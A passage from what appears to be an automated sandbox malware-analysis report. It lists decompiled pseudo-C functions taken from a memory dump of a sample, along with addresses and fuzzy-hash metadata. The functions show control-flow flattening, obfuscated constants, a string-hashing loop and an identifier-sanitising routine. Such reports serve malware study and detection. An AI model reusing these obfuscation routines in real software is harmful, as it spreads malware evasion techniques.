                                                                                                                                                                                                                    					_t247 = E00A75103(_t211);
                                                                                                                                                                                                                    					E00A7CD47(_v36, _t236, _t247, _v76, 1, _v32);
                                                                                                                                                                                                                    					_t249 = _t249 + 0x1c;
                                                                                                                                                                                                                    					_t237 = _t236 + _t247 * 2;
                                                                                                                                                                                                                    					_t210 = 0xe77fd06;
                                                                                                                                                                                                                    					_t199 = 0x2e;
                                                                                                                                                                                                                    					 *_t237 = _t199;
                                                                                                                                                                                                                    					_t236 = _t237 + 2;
                                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                                    				} while (_t210 != 0xebf1c7b);
                                                                                                                                                                                                                    				return _t201;
                                                                                                                                                                                                                    			}









































                                                                                                                                                                                                                    0x00a76db4
                                                                                                                                                                                                                    0x00a76dbb
                                                                                                                                                                                                                    0x00a76dbe
                                                                                                                                                                                                                    0x00a76dc2
                                                                                                                                                                                                                    0x00a76dc7
                                                                                                                                                                                                                    0x00a76dce
                                                                                                                                                                                                                    0x00a76dda
                                                                                                                                                                                                                    0x00a76ddf
                                                                                                                                                                                                                    0x00a76de4
                                                                                                                                                                                                                    0x00a76deb
                                                                                                                                                                                                                    0x00a76df2
                                                                                                                                                                                                                    0x00a76df6
                                                                                                                                                                                                                    0x00a76e00
                                                                                                                                                                                                                    0x00a76e05
                                                                                                                                                                                                                    0x00a76e0a
                                                                                                                                                                                                                    0x00a76e11
                                                                                                                                                                                                                    0x00a76e18
                                                                                                                                                                                                                    0x00a76e1f
                                                                                                                                                                                                                    0x00a76e23
                                                                                                                                                                                                                    0x00a76e2a
                                                                                                                                                                                                                    0x00a76e31
                                                                                                                                                                                                                    0x00a76e38
                                                                                                                                                                                                                    0x00a76e3f
                                                                                                                                                                                                                    0x00a76e43
                                                                                                                                                                                                                    0x00a76e4a
                                                                                                                                                                                                                    0x00a76e51
                                                                                                                                                                                                                    0x00a76e58
                                                                                                                                                                                                                    0x00a76e5f
                                                                                                                                                                                                                    0x00a76e66
                                                                                                                                                                                                                    0x00a76e6d
                                                                                                                                                                                                                    0x00a76e74
                                                                                                                                                                                                                    0x00a76e7b
                                                                                                                                                                                                                    0x00a76e82
                                                                                                                                                                                                                    0x00a76e89
                                                                                                                                                                                                                    0x00a76e90
                                                                                                                                                                                                                    0x00a76e97
                                                                                                                                                                                                                    0x00a76e9e
                                                                                                                                                                                                                    0x00a76ea5
                                                                                                                                                                                                                    0x00a76eac
                                                                                                                                                                                                                    0x00a76eb3
                                                                                                                                                                                                                    0x00a76eba
                                                                                                                                                                                                                    0x00a76ebe
                                                                                                                                                                                                                    0x00a76ec5
                                                                                                                                                                                                                    0x00a76ecc
                                                                                                                                                                                                                    0x00a76ed7
                                                                                                                                                                                                                    0x00a76eda
                                                                                                                                                                                                                    0x00a76edd
                                                                                                                                                                                                                    0x00a76ee4
                                                                                                                                                                                                                    0x00a76ef2
                                                                                                                                                                                                                    0x00a76ef9
                                                                                                                                                                                                                    0x00a76efa
                                                                                                                                                                                                                    0x00a76efd
                                                                                                                                                                                                                    0x00a76f04
                                                                                                                                                                                                                    0x00a76f0b
                                                                                                                                                                                                                    0x00a76f17
                                                                                                                                                                                                                    0x00a76f1a
                                                                                                                                                                                                                    0x00a76f21
                                                                                                                                                                                                                    0x00a76f28
                                                                                                                                                                                                                    0x00a76f2f
                                                                                                                                                                                                                    0x00a76f36
                                                                                                                                                                                                                    0x00a76f3d
                                                                                                                                                                                                                    0x00a76f46
                                                                                                                                                                                                                    0x00a76f4d
                                                                                                                                                                                                                    0x00a76f54
                                                                                                                                                                                                                    0x00a76f5b
                                                                                                                                                                                                                    0x00a76f62
                                                                                                                                                                                                                    0x00a76f66
                                                                                                                                                                                                                    0x00a76f6d
                                                                                                                                                                                                                    0x00a76f79
                                                                                                                                                                                                                    0x00a76f7e
                                                                                                                                                                                                                    0x00a76f83
                                                                                                                                                                                                                    0x00a76f8a
                                                                                                                                                                                                                    0x00a76f94
                                                                                                                                                                                                                    0x00a76f99
                                                                                                                                                                                                                    0x00a76fa1
                                                                                                                                                                                                                    0x00a76fa4
                                                                                                                                                                                                                    0x00a76fa7
                                                                                                                                                                                                                    0x00a76fae
                                                                                                                                                                                                                    0x00a76fb5
                                                                                                                                                                                                                    0x00a76fbc
                                                                                                                                                                                                                    0x00a76fc3
                                                                                                                                                                                                                    0x00a76fca
                                                                                                                                                                                                                    0x00a76fca
                                                                                                                                                                                                                    0x00a76fdc
                                                                                                                                                                                                                    0x00a77053
                                                                                                                                                                                                                    0x00a77058
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a77058
                                                                                                                                                                                                                    0x00a76fe4
                                                                                                                                                                                                                    0x00a770bd
                                                                                                                                                                                                                    0x00a770c7
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a770c7
                                                                                                                                                                                                                    0x00a76ff0
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a76fff
                                                                                                                                                                                                                    0x00a77000
                                                                                                                                                                                                                    0x00a77001
                                                                                                                                                                                                                    0x00a77005
                                                                                                                                                                                                                    0x00a77010
                                                                                                                                                                                                                    0x00a7701c
                                                                                                                                                                                                                    0x00a77024
                                                                                                                                                                                                                    0x00a77032
                                                                                                                                                                                                                    0x00a77037
                                                                                                                                                                                                                    0x00a7703a
                                                                                                                                                                                                                    0x00a7703d
                                                                                                                                                                                                                    0x00a77044
                                                                                                                                                                                                                    0x00a77045
                                                                                                                                                                                                                    0x00a77048
                                                                                                                                                                                                                    0x00a77048
                                                                                                                                                                                                                    0x00a7706b
                                                                                                                                                                                                                    0x00a7706c
                                                                                                                                                                                                                    0x00a7706d
                                                                                                                                                                                                                    0x00a77071
                                                                                                                                                                                                                    0x00a7707a
                                                                                                                                                                                                                    0x00a77087
                                                                                                                                                                                                                    0x00a7708c
                                                                                                                                                                                                                    0x00a7708f
                                                                                                                                                                                                                    0x00a77092
                                                                                                                                                                                                                    0x00a77099
                                                                                                                                                                                                                    0x00a7709a
                                                                                                                                                                                                                    0x00a7709d
                                                                                                                                                                                                                    0x00a770a0
                                                                                                                                                                                                                    0x00a770a0
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: #2$D~V<
                                                                                                                                                                                                                    • API String ID: 0-3496523135
                                                                                                                                                                                                                    • Opcode ID: f386a4315c459acf4f651cd5abe0ebf00a34649aaad2916bf930210b013ab6b4
                                                                                                                                                                                                                    • Instruction ID: 14bff57c39bb629f5226525e03614b8de35964176bee982ba2862d04ad49cc7f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f386a4315c459acf4f651cd5abe0ebf00a34649aaad2916bf930210b013ab6b4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 21917772E00209EBCF18DFA5D94AADEBFB2FF44314F208049E515BA260C7B41A46CF95
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                                                                                    			E00A77D4C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                    				char _v128;
                                                                                                                                                                                                                    				signed int _v132;
                                                                                                                                                                                                                    				signed int _v136;
                                                                                                                                                                                                                    				intOrPtr _v140;
                                                                                                                                                                                                                    				intOrPtr _v144;
                                                                                                                                                                                                                    				char _v148;
                                                                                                                                                                                                                    				signed int _v152;
                                                                                                                                                                                                                    				signed int _v156;
                                                                                                                                                                                                                    				signed int _v160;
                                                                                                                                                                                                                    				signed int _v164;
                                                                                                                                                                                                                    				signed int _v168;
                                                                                                                                                                                                                    				signed int _v172;
                                                                                                                                                                                                                    				signed int _v176;
                                                                                                                                                                                                                    				signed int _v180;
                                                                                                                                                                                                                    				signed int _v184;
                                                                                                                                                                                                                    				signed int _v188;
                                                                                                                                                                                                                    				signed int _v192;
                                                                                                                                                                                                                    				signed int _v196;
                                                                                                                                                                                                                    				signed int _v200;
                                                                                                                                                                                                                    				signed int _v204;
                                                                                                                                                                                                                    				signed int _v208;
                                                                                                                                                                                                                    				signed int _v212;
                                                                                                                                                                                                                    				void* _t144;
                                                                                                                                                                                                                    				signed int _t156;
                                                                                                                                                                                                                    				void* _t159;
                                                                                                                                                                                                                    				void* _t165;
                                                                                                                                                                                                                    				char* _t171;
                                                                                                                                                                                                                    				void* _t179;
                                                                                                                                                                                                                    				signed int _t180;
                                                                                                                                                                                                                    				signed int* _t185;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_push(_a12);
                                                                                                                                                                                                                    				_t179 = __ecx;
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                    				E00A7C6D8(_t144);
                                                                                                                                                                                                                    				_v136 = _v136 & 0x00000000;
                                                                                                                                                                                                                    				_t185 =  &(( &_v212)[5]);
                                                                                                                                                                                                                    				_v132 = _v132 & 0x00000000;
                                                                                                                                                                                                                    				_v144 = 0xae8f0c;
                                                                                                                                                                                                                    				_t165 = 0x1267c45;
                                                                                                                                                                                                                    				_v140 = 0x669d62;
                                                                                                                                                                                                                    				_v204 = 0x9330df;
                                                                                                                                                                                                                    				_v204 = _v204 | 0x02ae3125;
                                                                                                                                                                                                                    				_v204 = _v204 >> 9;
                                                                                                                                                                                                                    				_t180 = 0x41;
                                                                                                                                                                                                                    				_v204 = _v204 / _t180;
                                                                                                                                                                                                                    				_v204 = _v204 ^ 0x00052135;
                                                                                                                                                                                                                    				_v156 = 0xdcf3b8;
                                                                                                                                                                                                                    				_v156 = _v156 * 5;
                                                                                                                                                                                                                    				_v156 = _v156 ^ 0x045420e0;
                                                                                                                                                                                                                    				_v176 = 0x89551a;
                                                                                                                                                                                                                    				_v176 = _v176 + 0xe8d4;
                                                                                                                                                                                                                    				_v176 = _v176 + 0x1c51;
                                                                                                                                                                                                                    				_v176 = _v176 ^ 0x008dd06e;
                                                                                                                                                                                                                    				_v212 = 0xff4ace;
                                                                                                                                                                                                                    				_v212 = _v212 * 0x7a;
                                                                                                                                                                                                                    				_v212 = _v212 ^ 0xd38b7780;
                                                                                                                                                                                                                    				_v212 = _v212 * 0x4f;
                                                                                                                                                                                                                    				_v212 = _v212 ^ 0x80bbfa3b;
                                                                                                                                                                                                                    				_v172 = 0x6085e5;
                                                                                                                                                                                                                    				_v172 = _v172 + 0xe817;
                                                                                                                                                                                                                    				_v172 = _v172 ^ 0x006caf3b;
                                                                                                                                                                                                                    				_v180 = 0xaa7e4;
                                                                                                                                                                                                                    				_v180 = _v180 + 0xffff6f9c;
                                                                                                                                                                                                                    				_v180 = _v180 << 0xc;
                                                                                                                                                                                                                    				_v180 = _v180 ^ 0xa17981bb;
                                                                                                                                                                                                                    				_v188 = 0x8fb8f0;
                                                                                                                                                                                                                    				_v188 = _v188 + 0xffff53e1;
                                                                                                                                                                                                                    				_v188 = _v188 * 0x70;
                                                                                                                                                                                                                    				_v188 = _v188 ^ 0x3e9c90b5;
                                                                                                                                                                                                                    				_v160 = 0x245c09;
                                                                                                                                                                                                                    				_v160 = _v160 | 0x1d07d37a;
                                                                                                                                                                                                                    				_v160 = _v160 ^ 0x1d22c629;
                                                                                                                                                                                                                    				_v196 = 0x283ff7;
                                                                                                                                                                                                                    				_v196 = _v196 | 0xc0d9e01b;
                                                                                                                                                                                                                    				_v196 = _v196 + 0x7f89;
                                                                                                                                                                                                                    				_v196 = _v196 ^ 0xc0fc66d4;
                                                                                                                                                                                                                    				_v184 = 0x5e9434;
                                                                                                                                                                                                                    				_v184 = _v184 * 0xb;
                                                                                                                                                                                                                    				_v184 = _v184 * 0x2d;
                                                                                                                                                                                                                    				_v184 = _v184 ^ 0xb6ef0958;
                                                                                                                                                                                                                    				_v168 = 0x9719a5;
                                                                                                                                                                                                                    				_v168 = _v168 >> 2;
                                                                                                                                                                                                                    				_v168 = _v168 ^ 0x002dd062;
                                                                                                                                                                                                                    				_v192 = 0xacc6de;
                                                                                                                                                                                                                    				_v192 = _v192 + 0xffff77d2;
                                                                                                                                                                                                                    				_v192 = _v192 >> 0xb;
                                                                                                                                                                                                                    				_v192 = _v192 ^ 0x00069a8c;
                                                                                                                                                                                                                    				_v152 = 0xb633e8;
                                                                                                                                                                                                                    				_v152 = _v152 * 0x79;
                                                                                                                                                                                                                    				_v152 = _v152 ^ 0x5619350d;
                                                                                                                                                                                                                    				_v164 = 0xea2fb3;
                                                                                                                                                                                                                    				_v164 = _v164 | 0x08d64286;
                                                                                                                                                                                                                    				_v164 = _v164 ^ 0x08ffaa36;
                                                                                                                                                                                                                    				_v200 = 0x1d0691;
                                                                                                                                                                                                                    				_v200 = _v200 + 0xffff98f8;
                                                                                                                                                                                                                    				_v200 = _v200 >> 0xb;
                                                                                                                                                                                                                    				_v200 = _v200 + 0xdf;
                                                                                                                                                                                                                    				_v200 = _v200 ^ 0x000d2058;
                                                                                                                                                                                                                    				_v208 = 0xf3a4fe;
                                                                                                                                                                                                                    				_v208 = _v208 * 0x60;
                                                                                                                                                                                                                    				_v208 = _v208 >> 0xa;
                                                                                                                                                                                                                    				_t156 = _v208 * 0x23;
                                                                                                                                                                                                                    				_v208 = _t156;
                                                                                                                                                                                                                    				_v208 = _v208 ^ 0x031a3d5e;
                                                                                                                                                                                                                    				while(_t165 != 0x1267c45) {
                                                                                                                                                                                                                    					if(_t165 == 0x2da4d49) {
                                                                                                                                                                                                                    						_v148 = 0x80;
                                                                                                                                                                                                                    						_t156 = E00A7E639(_v204, _v156,  &_v148,  &_v128, _v176);
                                                                                                                                                                                                                    						_t185 =  &(_t185[3]);
                                                                                                                                                                                                                    						_t165 = 0x8656960;
                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					if(_t165 == 0x460886a) {
                                                                                                                                                                                                                    						_push(0xa6126c);
                                                                                                                                                                                                                    						_push(_v188);
                                                                                                                                                                                                                    						_push(_v180);
                                                                                                                                                                                                                    						_t159 = E00A7AF4E(_v212, _v172, __eflags);
                                                                                                                                                                                                                    						E00A75BB2(_t159, __eflags, _v196, E00A7E9BB(__eflags), _v184, _v168, _v192, _v160, _t179, _v152);
                                                                                                                                                                                                                    						return E00A7D6DF(_v164, _t159, _v200, _v208);
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					if(_t165 != 0x8656960) {
                                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                                    						__eflags = _t165 - 0xd8677b;
                                                                                                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						return _t156;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					_t171 =  &_v128;
                                                                                                                                                                                                                    					if(_v128 == 0) {
                                                                                                                                                                                                                    						L14:
                                                                                                                                                                                                                    						_t165 = 0x460886a;
                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                    						goto L6;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                    						_t156 =  *_t171;
                                                                                                                                                                                                                    						if(_t156 < 0x30 || _t156 > 0x39) {
                                                                                                                                                                                                                    							if(_t156 < 0x61 || _t156 > 0x7a) {
                                                                                                                                                                                                                    								if(_t156 < 0x41 || _t156 > 0x5a) {
                                                                                                                                                                                                                    									 *_t171 = 0x58;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						_t171 = _t171 + 1;
                                                                                                                                                                                                                    					} while ( *_t171 != 0);
                                                                                                                                                                                                                    					goto L14;
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    				_t165 = 0x2da4d49;
                                                                                                                                                                                                                    				goto L17;
                                                                                                                                                                                                                    			}

































                                                                                                                                                                                                                    0x00a77d56
                                                                                                                                                                                                                    0x00a77d5d
                                                                                                                                                                                                                    0x00a77d5f
                                                                                                                                                                                                                    0x00a77d66
                                                                                                                                                                                                                    0x00a77d6d
                                                                                                                                                                                                                    0x00a77d6e
                                                                                                                                                                                                                    0x00a77d6f
                                                                                                                                                                                                                    0x00a77d74
                                                                                                                                                                                                                    0x00a77d79
                                                                                                                                                                                                                    0x00a77d7c
                                                                                                                                                                                                                    0x00a77d83
                                                                                                                                                                                                                    0x00a77d8b
                                                                                                                                                                                                                    0x00a77d90
                                                                                                                                                                                                                    0x00a77d98
                                                                                                                                                                                                                    0x00a77da0
                                                                                                                                                                                                                    0x00a77da8
                                                                                                                                                                                                                    0x00a77db3
                                                                                                                                                                                                                    0x00a77db6
                                                                                                                                                                                                                    0x00a77dba
                                                                                                                                                                                                                    0x00a77dc2
                                                                                                                                                                                                                    0x00a77dcf
                                                                                                                                                                                                                    0x00a77dd3
                                                                                                                                                                                                                    0x00a77ddb
                                                                                                                                                                                                                    0x00a77de3
                                                                                                                                                                                                                    0x00a77deb
                                                                                                                                                                                                                    0x00a77df3
                                                                                                                                                                                                                    0x00a77dfb
                                                                                                                                                                                                                    0x00a77e08
                                                                                                                                                                                                                    0x00a77e0c
                                                                                                                                                                                                                    0x00a77e19
                                                                                                                                                                                                                    0x00a77e1d
                                                                                                                                                                                                                    0x00a77e25
                                                                                                                                                                                                                    0x00a77e2d
                                                                                                                                                                                                                    0x00a77e35
                                                                                                                                                                                                                    0x00a77e3d
                                                                                                                                                                                                                    0x00a77e45
                                                                                                                                                                                                                    0x00a77e4d
                                                                                                                                                                                                                    0x00a77e52
                                                                                                                                                                                                                    0x00a77e5a
                                                                                                                                                                                                                    0x00a77e62
                                                                                                                                                                                                                    0x00a77e6f
                                                                                                                                                                                                                    0x00a77e73
                                                                                                                                                                                                                    0x00a77e7b
                                                                                                                                                                                                                    0x00a77e83
                                                                                                                                                                                                                    0x00a77e8b
                                                                                                                                                                                                                    0x00a77e93
                                                                                                                                                                                                                    0x00a77e9b
                                                                                                                                                                                                                    0x00a77ea3
                                                                                                                                                                                                                    0x00a77eab
                                                                                                                                                                                                                    0x00a77eb3
                                                                                                                                                                                                                    0x00a77ec0
                                                                                                                                                                                                                    0x00a77ec9
                                                                                                                                                                                                                    0x00a77ecd
                                                                                                                                                                                                                    0x00a77ed5
                                                                                                                                                                                                                    0x00a77edd
                                                                                                                                                                                                                    0x00a77ee2
                                                                                                                                                                                                                    0x00a77eea
                                                                                                                                                                                                                    0x00a77ef2
                                                                                                                                                                                                                    0x00a77efa
                                                                                                                                                                                                                    0x00a77eff
                                                                                                                                                                                                                    0x00a77f07
                                                                                                                                                                                                                    0x00a77f14
                                                                                                                                                                                                                    0x00a77f18
                                                                                                                                                                                                                    0x00a77f20
                                                                                                                                                                                                                    0x00a77f28
                                                                                                                                                                                                                    0x00a77f30
                                                                                                                                                                                                                    0x00a77f38
                                                                                                                                                                                                                    0x00a77f45
                                                                                                                                                                                                                    0x00a77f52
                                                                                                                                                                                                                    0x00a77f5c
                                                                                                                                                                                                                    0x00a77f64
                                                                                                                                                                                                                    0x00a77f6c
                                                                                                                                                                                                                    0x00a77f79
                                                                                                                                                                                                                    0x00a77f7d
                                                                                                                                                                                                                    0x00a77f82
                                                                                                                                                                                                                    0x00a77f87
                                                                                                                                                                                                                    0x00a77f8b
                                                                                                                                                                                                                    0x00a77f93
                                                                                                                                                                                                                    0x00a77f9d
                                                                                                                                                                                                                    0x00a77fee
                                                                                                                                                                                                                    0x00a77ff7
                                                                                                                                                                                                                    0x00a77ffc
                                                                                                                                                                                                                    0x00a77fff
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a77fff
                                                                                                                                                                                                                    0x00a77fa1
                                                                                                                                                                                                                    0x00a7800f
                                                                                                                                                                                                                    0x00a78014
                                                                                                                                                                                                                    0x00a78018
                                                                                                                                                                                                                    0x00a78024
                                                                                                                                                                                                                    0x00a78054
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7806c
                                                                                                                                                                                                                    0x00a77fa5
                                                                                                                                                                                                                    0x00a78005
                                                                                                                                                                                                                    0x00a78005
                                                                                                                                                                                                                    0x00a7800b
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7800b
                                                                                                                                                                                                                    0x00a77fac
                                                                                                                                                                                                                    0x00a77fb0
                                                                                                                                                                                                                    0x00a77fd5
                                                                                                                                                                                                                    0x00a77fd5
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a77fb2
                                                                                                                                                                                                                    0x00a77fb2
                                                                                                                                                                                                                    0x00a77fb2
                                                                                                                                                                                                                    0x00a77fb6
                                                                                                                                                                                                                    0x00a77fbe
                                                                                                                                                                                                                    0x00a77fc6
                                                                                                                                                                                                                    0x00a77fcc
                                                                                                                                                                                                                    0x00a77fcc
                                                                                                                                                                                                                    0x00a77fc6
                                                                                                                                                                                                                    0x00a77fbe
                                                                                                                                                                                                                    0x00a77fcf
                                                                                                                                                                                                                    0x00a77fd0
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a77fb2
                                                                                                                                                                                                                    0x00a78003
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: \$$X
                                                                                                                                                                                                                    • API String ID: 0-3778266267
                                                                                                                                                                                                                    • Opcode ID: cf94ec10e8914ce39f94c241154880623efff0f8aef8ec65c2274e5eed2e8d57
                                                                                                                                                                                                                    • Instruction ID: 9e1f7f567b0b0f9c76779b07745adc9f0a27156ea11e360e0bac07d603400eff
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cf94ec10e8914ce39f94c241154880623efff0f8aef8ec65c2274e5eed2e8d57
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D18132714083419FC768CF21CA8961FBBF1BBC4748F50991DF19A96260D7B18A4ACF83
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                                    			E00A7D454(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				void* _t74;
                                                                                                                                                                                                                    				char* _t89;
                                                                                                                                                                                                                    				char* _t91;
                                                                                                                                                                                                                    				signed int _t92;
                                                                                                                                                                                                                    				signed int _t93;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_push(_t91);
                                                                                                                                                                                                                    				_push(_t91);
                                                                                                                                                                                                                    				_push(_a12);
                                                                                                                                                                                                                    				_t89 = _t91;
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_push(_t89);
                                                                                                                                                                                                                    				E00A7C6D8(_t74);
                                                                                                                                                                                                                    				_v8 = 0x419dbd;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0xd7b0c2a7;
                                                                                                                                                                                                                    				_t92 = 0x76;
                                                                                                                                                                                                                    				_v8 = _v8 / _t92;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x4a2def6a;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x4bf9931d;
                                                                                                                                                                                                                    				_v12 = 0x394551;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0xacdc4730;
                                                                                                                                                                                                                    				_t93 = 0xe;
                                                                                                                                                                                                                    				_v12 = _v12 / _t93;
                                                                                                                                                                                                                    				_v12 = _v12 * 0xb;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x87d881df;
                                                                                                                                                                                                                    				_v12 = 0xe24417;
                                                                                                                                                                                                                    				_v12 = _v12 >> 8;
                                                                                                                                                                                                                    				_v12 = _v12 * 0x4d;
                                                                                                                                                                                                                    				_v12 = _v12 << 4;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x0440e750;
                                                                                                                                                                                                                    				if( *_t89 != 0) {
                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                    						_v12 = 0x394551;
                                                                                                                                                                                                                    						_v12 = _v12 ^ 0xacdc4730;
                                                                                                                                                                                                                    						_v12 = _v12 / _t93;
                                                                                                                                                                                                                    						_v12 = _v12 * 0xb;
                                                                                                                                                                                                                    						_v12 = _v12 ^ 0x87d881df;
                                                                                                                                                                                                                    						_v12 = 0xe24417;
                                                                                                                                                                                                                    						_v12 = _v12 >> 8;
                                                                                                                                                                                                                    						_v12 = _v12 * 0x4d;
                                                                                                                                                                                                                    						_v12 = _v12 << 4;
                                                                                                                                                                                                                    						_v12 = _v12 ^ 0x0440e750;
                                                                                                                                                                                                                    						_v8 =  *_t89;
                                                                                                                                                                                                                    						_v8 = _v8 + (_v8 << _v12);
                                                                                                                                                                                                                    						_v8 = _v8 + (_v8 << _v12);
                                                                                                                                                                                                                    						_v8 = _v8 - _v8;
                                                                                                                                                                                                                    						_t89 = _t89 + 1;
                                                                                                                                                                                                                    						_t93 = 0xe;
                                                                                                                                                                                                                    					} while ( *_t89 != 0);
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                    0x00a7d457
                                                                                                                                                                                                                    0x00a7d458
                                                                                                                                                                                                                    0x00a7d45a
                                                                                                                                                                                                                    0x00a7d45d
                                                                                                                                                                                                                    0x00a7d45f
                                                                                                                                                                                                                    0x00a7d462
                                                                                                                                                                                                                    0x00a7d466
                                                                                                                                                                                                                    0x00a7d467
                                                                                                                                                                                                                    0x00a7d46c
                                                                                                                                                                                                                    0x00a7d476
                                                                                                                                                                                                                    0x00a7d484
                                                                                                                                                                                                                    0x00a7d489
                                                                                                                                                                                                                    0x00a7d48e
                                                                                                                                                                                                                    0x00a7d495
                                                                                                                                                                                                                    0x00a7d49c
                                                                                                                                                                                                                    0x00a7d4a3
                                                                                                                                                                                                                    0x00a7d4ad
                                                                                                                                                                                                                    0x00a7d4b0
                                                                                                                                                                                                                    0x00a7d4b7
                                                                                                                                                                                                                    0x00a7d4ba
                                                                                                                                                                                                                    0x00a7d4c1
                                                                                                                                                                                                                    0x00a7d4c8
                                                                                                                                                                                                                    0x00a7d4d0
                                                                                                                                                                                                                    0x00a7d4d3
                                                                                                                                                                                                                    0x00a7d4d7
                                                                                                                                                                                                                    0x00a7d4e1
                                                                                                                                                                                                                    0x00a7d4e5
                                                                                                                                                                                                                    0x00a7d4ea
                                                                                                                                                                                                                    0x00a7d4f1
                                                                                                                                                                                                                    0x00a7d4ff
                                                                                                                                                                                                                    0x00a7d506
                                                                                                                                                                                                                    0x00a7d509
                                                                                                                                                                                                                    0x00a7d516
                                                                                                                                                                                                                    0x00a7d51d
                                                                                                                                                                                                                    0x00a7d527
                                                                                                                                                                                                                    0x00a7d52a
                                                                                                                                                                                                                    0x00a7d52e
                                                                                                                                                                                                                    0x00a7d53e
                                                                                                                                                                                                                    0x00a7d541
                                                                                                                                                                                                                    0x00a7d546
                                                                                                                                                                                                                    0x00a7d549
                                                                                                                                                                                                                    0x00a7d54c
                                                                                                                                                                                                                    0x00a7d54d
                                                                                                                                                                                                                    0x00a7d54e
                                                                                                                                                                                                                    0x00a7d554
                                                                                                                                                                                                                    0x00a7d55c

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: QE9$j-J
                                                                                                                                                                                                                    • API String ID: 0-3178638157
                                                                                                                                                                                                                    • Opcode ID: 09430f0acf130ce8dfaa7e2aad37b7845058ab5b7a80d629debf6e98a943356d
                                                                                                                                                                                                                    • Instruction ID: 9e087a4fbeb4c5f95fd671bbc829802d909efb18dc1e8ef34769f49a7217e246
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09430f0acf130ce8dfaa7e2aad37b7845058ab5b7a80d629debf6e98a943356d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7531BDB5D00608BBEF09DFA4D98A9DEBFB5EF85314F20C49AD405AB250D3B06B95DB40
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                    			E00A67582(void* __ecx, void* __eflags) {
                                                                                                                                                                                                                    				unsigned int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                    				unsigned int _v28;
                                                                                                                                                                                                                    				signed int _v32;
